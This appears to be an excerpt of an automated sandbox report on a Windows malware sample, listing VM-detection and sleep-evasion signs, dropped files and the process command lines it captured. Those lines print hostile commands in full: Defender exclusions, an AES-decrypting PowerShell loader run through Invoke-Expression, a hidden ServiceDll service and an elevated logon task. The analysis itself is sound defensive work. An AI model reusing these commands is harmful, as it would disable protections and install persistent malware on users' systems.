    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\svchost.exe | File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FF9C550631D sldt word ptr [eax]
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1432
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8470
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1474
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8347
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3509
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6206
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1900
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7912
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2828
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6961
    Source: C:\Windows \System32\printui.exe | Dropped PE file which has not been started: C:\Windows\System32\vcruntime140d.dll
    Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Windows \System32\x249569.dat
    Source: C:\Program Files\7-Zip\7zFM.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.dat
    Source: C:\Windows \System32\printui.exe | Dropped PE file which has not been started: C:\Windows\System32\ucrtbased.dll
    Source: C:\Windows\System32\svchost.exe | API coverage: 0.5 %
    Source: C:\Windows\System32\OpenWith.exe TID: 6948 | Thread sleep count: 34 > 30
    Source: C:\Windows\System32\svchost.exe TID: 6312 | Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752 | Thread sleep count: 1432 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752 | Thread sleep count: 8470 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1472 | Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1212 | Thread sleep count: 1474 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1228 | Thread sleep count: 8347 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3132 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\console_zero.exe TID: 3408 | Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\timeout.exe TID: 1544 | Thread sleep count: 85 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5252 | Thread sleep count: 3509 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5252 | Thread sleep count: 6206 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1304 | Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6624 | Thread sleep count: 1900 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6684 | Thread sleep count: 7912 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6584 | Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088 | Thread sleep count: 2828 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088 | Thread sleep count: 6961 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6352 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_64946F50 GetSystemTimeAdjustment followed by cmp: cmp ecx, 03h and CTI: jle 64946F63h
    Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\ FullSizeInformation
    Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\Windows\System32 FullSizeInformation
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00007FFA4185014C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00007FFA41850008 FindClose,FindFirstFileExW,GetLastError
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\console_zero.exe | Thread delayed: delay time: 30000
    Source: svchost.exe, 0000000B.00000002.2314135054.000001F54E82B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: svchost.exe, 0000000B.00000002.2315993422.000001F54E84E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6b
    Source: svchost.exe, 0000000B.00000002.2314135054.000001F54E82B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
    Source: svchost.exe, 00000003.00000002.2339567614.00000150FCA64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2321378970.00000150FB22F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: svchost.exe, 0000000B.00000002.2309415733.000001F54E80B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
    Source: svchost.exe, 0000000B.00000002.2322397815.000001F54E902000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
    Source: svchost.exe, 0000000B.00000002.2315993422.000001F54E84E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
    Source: svchost.exe, 0000002E.00000002.2347960506.00000224C243C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: svchost.exe, 0000000B.00000002.2319192112.000001F54E867000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000e1}
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_649461C0 IsDebuggerPresent,RaiseException
    Source: C:\Windows\System32\console_zero.exe | Code function: 51_2_00007FFA3312B470 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,GetSystemDirectoryW,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,QueryPerformanceFrequency
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_64947650 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_6828C940 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00007FFA2CEAEE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00007FFA2CEAFA50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00007FFA2CF16630 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00007FFA2CF16F94 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00007FFA2CF17178 SetUnhandledExceptionFilter
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00007FFA41852770 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00007FFA41866A2C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
    Source: C:\Windows\System32\console_zero.exe | Code function: 51_2_00007FFA33146224 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
    Source: C:\Windows\System32\console_zero.exe | Code function: 51_2_00007FFA331457A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
    Source: C:\Windows\System32\console_zero.exe | Code function: 51_2_00007FFA5112E24C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
    Source: C:\Windows\System32\console_zero.exe | Code function: 51_2_00007FFA5112D768 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

    HIPS / PFW / Operating System Protection Evasion

    Source: Yara match File source: amsi64_3740.amsi.csv, type: OTHER
    Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
    Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
    Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
    Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
    Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe explorer "..\USB Drive"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy "x249569.dat" "C:\Windows \System32" /Y
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start x338625
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [system.security.cryptography.aes]::create(); $aee.key = $ky; $aee.iv = $vv; $decr = $aee.createdecryptor($aee.key, $aee.iv); $ciptbyt = [system.convert]::frombase64string($cptx); $decrbyt = $decr.transformfinalblock($ciptbyt, 0, $ciptbyt.length); return [system.text.encoding]::utf8.getstring($decrbyt); } $b64 = 'bewpxcexni2h+9tnoro88vzr8lsvfbhxwo43zjwb2uee39wbwt2wfyjn+m6ajl2oz3gigcocur6wcc/5iylv6c3hjnhgfxv59acfokqxmkxu/mfojbe45vyaxpin5erm20zro4flljjjuxjlix/f0tok8te1cgaqlpe0b+bo2x4qgs6hralwujuorg9gjhgh'; $ky = [byte[]](0x1e, 0x5b, 0x26, 0xf0, 0x75, 0x52, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe4, 0x98, 0xe4); $vv = [byte[]](0x10, 0x5b, 0x26, 0xe1, 0x75, 0x51, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe1, 0x88, 0xff); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; invoke-expression $pcmd;"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [system.security.cryptography.aes]::create(); $aee.key = $ky; $aee.iv = $vv; $decr = $aee.createdecryptor($aee.key, $aee.iv); $ciptbyt = [system.convert]::frombase64string($cptx); $decrbyt = $decr.transformfinalblock($ciptbyt, 0, $ciptbyt.length); return [system.text.encoding]::utf8.getstring($decrbyt); } $b64 = 'bewpxcexni2h+9tnoro88vzr8lsvfbhxwo43zjwb2uee39wbwt2wfyjn+m6ajl2oz3gigcocur6wcc/5iylv6c3hjnhgfxv59acfokqxmkxu/mfojbe45vyaxpin5erm20zro4flljjjuxjlix/f0tok8te1cgaqlpe0b+bo2x4qgs6hralwujuorg9gjhgh'; $ky = [byte[]](0x1e, 0x5b, 0x26, 0xf0, 0x75, 0x52, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe4, 0x98, 0xe4); $vv = [byte[]](0x10, 0x5b, 0x26, 0xe1, 0x75, 0x51, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe1, 0x88, 0xff); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; invoke-expression $pcmd;"
    Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x338625 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x338625\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x338625.dat" /f && sc start x338625
    Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoA,46_2_68295290
    Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoA,46_2_682A1460
    Source: C:\Windows\System32\svchost.exe Code function: strtoul,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,strncmp,46_2_682864E0
    Source: C:\Windows\System32\svchost.exe Code function: strchr,pthread_mutex_lock,strcmp,strncpy,EnumSystemLocalesA,pthread_mutex_unlock,strcpy,pthread_mutex_unlock,abort,46_2_68287D70
    Source: C:\Windows\System32\svchost.exe Code function: getenv,GetLocaleInfoA,46_2_68286680
    Source: C:\Windows\System32\svchost.exe Code function: memset,MultiByteToWideChar,GetLocaleInfoEx,malloc,malloc,strspn,46_2_00007FFA2CF14B70
    Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesW,46_2_00007FFA418731AC
    Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesEx,46_2_00007FFA41873674
    Source: C:\Windows\System32\svchost.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,46_2_00007FFA418814CC
    Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesW,46_2_00007FFA41881830
    Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,FormatMessageA,46_2_00007FFA41850830
    Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,GetLocaleInfoW,46_2_00007FFA41873744
    Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesW,46_2_00007FFA41881900
    Source: C:\Windows\System32\svchost.exe Code function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,46_2_00007FFA41873CA4
    Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,46_2_00007FFA41881D34
    Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,46_2_00007FFA41881F2C
    Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
    Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
    Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
    Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
